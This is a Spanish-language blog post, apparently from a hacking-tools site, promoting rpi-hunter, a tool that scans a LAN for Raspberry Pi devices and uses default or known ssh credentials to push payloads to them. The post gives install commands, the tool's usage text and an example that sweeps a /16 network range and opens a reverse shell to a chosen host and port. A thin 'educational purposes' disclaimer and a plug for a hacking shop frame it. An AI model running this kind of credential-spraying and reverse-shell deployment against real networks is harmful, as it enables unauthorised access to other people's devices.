Rpi-Hunter: Automatiza el descubrimiento y descarga payloads en Raspberry Pi a través de ssh.

0
467
views

Automatiza el descubrimiento y la caída de las cargas útiles en LAN Raspberry Pi a través de ssh.

rpi-hunter es útil cuando hay múltiples Raspberry Pi en su LAN con credenciales predeterminadas o conocidas, con el fin de automatizar el envío de comandos / cargas útiles a ellos.

Instalación

 

  1. Dependencias de instalación: sudo pip install -U argparse termcolor y sudo apt -y install arp-scan tshark sshpass
  2. Descargue rpi-hunter: git clone https://github.com/BusesCanFly/rpi-hunter
  3. Navega a rpi-hunter: cd ./rpi-hunter
  4. Hacer rpi-hunter.py ejecutable: chmod +x rpi-hunter.py
  • Una variante de línea: sudo pip install -U argparse termcolor && sudo apt -y install arp-scan tshark sshpass && git clone https://github.com/BusesCanFly/rpi-hunter && cd ./rpi-hunter && chmod +x rpi-hunter.py

Modo de uso

usage: rpi-hunter.py [-h] [--list] [--no-scan] [-r IP_RANGE] [-f IP_LIST] [-c CREDS] [--payload PAYLOAD] [-H HOST] [-P PORT] [--safe] [-q] optional arguments: -h, --help show this help message and exit --list List available payloads --no-scan Disable ARP scanning -r IP_RANGE IP range to scan -f IP_LIST IP list to use (Default ./scan/RPI_list) -u UNAME Username to use when ssh'ing -c CREDS Password to use when ssh'ing --payload PAYLOAD (Name of, or raw) Payload [ex. reverse_shell or 'whoami'] -H HOST (If using reverse_shell payload) Host for reverse shell -P PORT (If using reverse_shell payload) Port for reverse shell --safe Print sshpass command, but don't execute it -q Don't print banner
  • Ejemplo de uso: ./rpi-hunter.py -r 192.168.0.0/16 --payload reverse_shell -H 127.0.0.1 -P 1337
  • Ejecute ./rpi-hunter.py --list para ver las cargas útiles disponibles.
  • Las cargas útiles se pueden especificar por el nombre de carga útil de --list o como entrada sin procesar
    • ex. --payload reverse_shell o --payload [tus comandos cli aqui]

Descarga Rpi-Hunter

Toda la información proporcionada en este medio es para fines educativos, en ningún caso alguno se hace responsable e cualquier mal uso de la información. Toda la información es para el desarrollo e investigación de métodos de seguridad informática.

No olvides visitar nuestra hacking shop

shop